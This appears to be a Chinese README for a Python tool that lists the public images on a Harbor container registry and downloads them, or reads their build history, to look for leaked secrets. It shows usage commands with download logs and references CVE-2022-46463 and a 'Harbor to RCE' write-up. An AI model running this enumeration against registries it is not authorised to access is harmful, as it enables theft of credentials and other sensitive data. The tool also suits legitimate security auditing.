Harbor是一款开源的镜像托管平台。
此脚本通过列举所有的pulic镜像,支持dump操作(类似docker pull
),方便从公开暴露的镜像中查找敏感泄漏信息。
$ python3 harbor.py https://192.168.11.11
[+] grafana/grafana
[+] library/openjdk
$ python3 harbor.py https://192.168.11.11 --dump library/openjdk:8
[+] Dumping library/openjdk:8
[+] Downloading : 001c52e26ad57e3b25b439ee0052f6692e5c0f2d5d982a00a8819ace5e521452
[+] Downloading : d9d4b9b6e964657da49910b495173d6c4f0d9bc47b3b44273cf82fd32723d165
[+] Downloading : 2068746827ec1b043b571e4788693eab7e9b2a95301176512791f8c317a2816a
[+] Downloading : 9daef329d35093868ef75ac8b7c6eb407fa53abbcb3a264c218c2ec7bca716e6
[+] Downloading : d85151f15b6683b98f21c3827ac545188b1849efb14a1049710ebc4692de3dd5
[+] Downloading : 52a8c426d30b691c4f7e8c4b438901ddeb82ff80d4540d5bbd49986376d85cc9
[+] Downloading : 8754a66e005039a091c5ad0319f055be393c7123717b1f6fee8647c338ff3ceb
$ python3 harbor.py https://192.168.11.11 --dump_all
[+] grafana/grafana
[+] library/openjdk
[+] Dumping grafana/grafana:latest
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
[+] Dumping library/openjdk:8
[+] Downloading : 001c52e26ad57e3b25b439ee0052f6692e5c0f2d5d982a00a8819ace5e521452
[+] Downloading : d9d4b9b6e964657da49910b495173d6c4f0d9bc47b3b44273cf82fd32723d165
[+] Downloading : 2068746827ec1b043b571e4788693eab7e9b2a95301176512791f8c317a2816a
[+] Downloading : 9daef329d35093868ef75ac8b7c6eb407fa53abbcb3a264c218c2ec7bca716e6
[+] Downloading : d85151f15b6683b98f21c3827ac545188b1849efb14a1049710ebc4692de3dd5
[+] Downloading : 52a8c426d30b691c4f7e8c4b438901ddeb82ff80d4540d5bbd49986376d85cc9
[+] Downloading : 8754a66e005039a091c5ad0319f055be393c7123717b1f6fee8647c338ff3ceb
$ python3 harbor.py https://192.168.11.11 --tags --history
无需下载镜像,从构建历史中获取敏感信息
Harbor to RCE
关于Habor CVE-2022-46463的说明
Harbor 未授权漏洞的背后是魔幻的荒诞主义